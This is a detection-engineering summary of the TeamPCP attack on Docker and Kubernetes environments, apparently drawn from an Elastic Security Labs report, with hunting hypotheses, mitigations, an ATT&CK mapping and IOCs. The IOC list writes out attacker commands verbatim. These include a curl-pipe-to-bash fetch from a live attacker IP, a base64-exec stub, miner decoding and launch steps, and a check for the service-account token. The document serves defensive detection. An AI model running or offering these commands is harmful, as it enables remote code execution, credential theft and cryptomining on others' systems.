Linux & Cloud Detection Engineering - TeamPCP Container Attack Scenario
The TeamPCP threat actor targets cloud-native and containerized environments to deploy cryptominers and ransomware. The attack chain involves initial access via web server exploitation, in-memory payload execution, Kubernetes API abuse for lateral movement, and node-level escape using privileged DaemonSets.
Authors: Elastic Security Labs
Source:
Elastic Security Labs
- filename/etc/systemd/system/teampcp-react.serviceSystemd service created for persistence.
- urlhxxp://44[.]252[.]85[.]168:666/files/kube.pyPython script used for Kubernetes lateral movement.
- urlhxxp://67[.]217[.]57[.]240:666/files/proxy.shInitial access payload downloaded and piped to shell.
Key Takeaways
- TeamPCP targets containerized environments, utilizing 'pipe-to-shell' execution to avoid disk artifacts.
- Attackers actively hunt for Kubernetes service account tokens to escalate privileges and move laterally.
- Persistence is attempted via systemd services, which is highly anomalous for standard container lifecycles.
- Node-level escape is achieved by deploying privileged DaemonSets with HostPID, HostNetwork, and hostPath mounts.
- The attack culminates in the deployment of cryptominers and tunneling tools (gost, frps) for sustained access.
Affected Systems
- Linux
- Docker
- Kubernetes
- Web Servers
Vulnerabilities (CVEs)
- React2Shell
Attack Chain
The attack begins with web server exploitation (React2Shell) or a pipe-to-shell command to gain initial execution inside a container. The attacker kills competing miners and checks for Kubernetes service account tokens to enable lateral movement via a downloaded Python script (kube.py). Persistence is attempted by writing a systemd service, and tunneling tools like gost and frps are installed for C2. Finally, a base64-encoded cryptominer is decoded, made executable, and launched, while the attacker escalates to node control by deploying a privileged DaemonSet.
Detection Availability
- YARA Rules: No
- Sigma Rules: No
- Snort/Suricata Rules: No
- KQL Queries: No
- Splunk SPL Queries: No
- EQL Queries: Yes
- Other Detection Logic: No
- Platforms: Elastic Defend for Containers (D4C), Elastic Query Language (EQL)
The article provides numerous EQL queries designed for Elastic Defend for Containers (D4C) to detect interactive shell executions, file creations in sensitive paths, package manager abuse, and Kubernetes API anomalies.
Detection Engineering Assessment
EDR Visibility: High — Container-aware EDRs (like Elastic D4C) can capture process lineage, interactive execution flags, and file modifications within the container context. Network Visibility: Medium — Network visibility can detect the downloading of payloads and tunneling activity (gost/frps), but encrypted C2 or internal cluster traffic may be harder to inspect without specific integrations. Detection Difficulty: Moderate — While the individual actions (e.g., curl | bash, chmod +x) are highly suspicious in a container context, correlating them across ephemeral workloads and Kubernetes control planes requires mature centralized logging and correlation.
Required Log Sources
- Container Runtime Logs
- Kubernetes Audit Logs
- Process Execution Logs (execve)
- File Creation/Modification Logs
Hunting Hypotheses
| Hypothesis | Telemetry | ATT&CK Stage | FP Risk |
|---|---|---|---|
| Look for interactive shell processes (e.g., bash, sh) spawned by web servers or network utilities (curl, wget) within a container context. | Process Execution | Initial Access / Execution | Low |
| Search for file creation or modification events in systemd directories (/etc/systemd/system/) originating from inside a container. | File Activity | Persistence | Low |
| Identify package managers (apk, apt, yum) being executed interactively in running containers to install network or shell utilities. | Process Execution | Defense Evasion / Setup | Medium |
| Monitor for the execution of base64 decoding commands (e.g., base64 -d, python -c 'base64.b64decode') piped to interpreters or outputting to executable files in /tmp. | Process Execution | Defense Evasion | Low |
| Detect Kubernetes audit logs showing a service account enumerating secrets or pods across all namespaces, especially using unusual user agents like Python urllib. | Kubernetes Audit Logs | Discovery / Lateral Movement | Low |
Control Gaps
- Lack of Kubernetes Audit Log monitoring
- Overprivileged Kubernetes Service Accounts
- Containers running as root or with privileged mode allowed
Key Behavioral Indicators
- Interactive execution flag true for curl/wget
- Process killing (pkill) of known miner names
- chmod +x in world-writable directories (/tmp)
- Creation of privileged DaemonSets with HostPID/HostNetwork
False Positive Assessment
- Low. The combination of interactive execution, package manager usage in running containers, and systemd modifications inside containers are highly anomalous for standard production workloads.
Recommendations
Immediate Mitigation
- Isolate compromised containers and nodes.
- Revoke compromised Kubernetes service account tokens.
- Block known C2 IP addresses (67.217.57.240, 44.252.85.168).
Infrastructure Hardening
- Implement Kubernetes Pod Security Standards (PSS) to prevent privileged pods, HostPID, and HostNetwork.
- Enforce least privilege for Kubernetes Service Accounts and ClusterRoles.
- Make container root filesystems read-only where possible.
User Protection
- Patch web-facing applications against known RCE vulnerabilities (e.g., React2Shell).
Security Awareness
- Train DevOps and engineering teams on the risks of overprivileged containers and the importance of immutable infrastructure.
MITRE ATT&CK Mapping
- T1190 - Exploit Public-Facing Application
- T1059.004 - Command and Scripting Interpreter: Unix Shell
- T1059.006 - Command and Scripting Interpreter: Python
- T1562.001 - Impair Defenses: Disable or Modify Tools
- T1613 - Container and Resource Discovery
- T1543.002 - Create or Modify System Process: Systemd Service
- T1090 - Proxy
- T1140 - Deobfuscate/Decode Files or Information
- T1611 - Escape to Host
- T1496 - Resource Hijacking
Additional IOCs
- Domains:
update[.]aegis[.]aliyun[.]com- Domain used to download uninstall script for competing tools.
- Urls:
hxxp://update[.]aegis[.]aliyun[.]com/download/uninstall.sh- Script to uninstall competing security/mining tools.
- File Paths:
/tmp/k8s.py- Downloaded kube.py script/tmp/miner.b64- Base64 encoded miner payload/tmp/miner- Decoded executable miner/opt/teampcp- Directory used for tunneling tools/var/run/secrets/kubernetes.io/serviceaccount/token- Targeted for K8s discovery
- Command Lines:
- Purpose: Download and execute initial payload in memory | Tools:
curl,bash| Stage: Initial Access / Execution |curl -fsSL http://67.217.57.240:666/files/proxy.sh | bash - Purpose: Kill competing cryptominers | Tools:
pkill| Stage: Defense Evasion |pkill -9 xmrig - Purpose: Check for Kubernetes service account token | Tools:
sh| Stage: Discovery |if [ -f /var/run/secrets/kubernetes.io/serviceaccount/token ] - Purpose: Install required tooling dynamically | Tools:
apk| Stage: Defense Evasion / Setup |apk add --no-cache curl bash python3 - Purpose: Decode base64 payload | Tools:
python3,base64| Stage: Defense Evasion |python3 -c "exec(base64.b64decode( - Purpose: Decode and execute miner | Tools:
sh,base64,chmod| Stage: Execution / Impact |base64 -d /tmp/miner.b64 > /tmp/miner && chmod +x /tmp/miner
- Purpose: Download and execute initial payload in memory | Tools: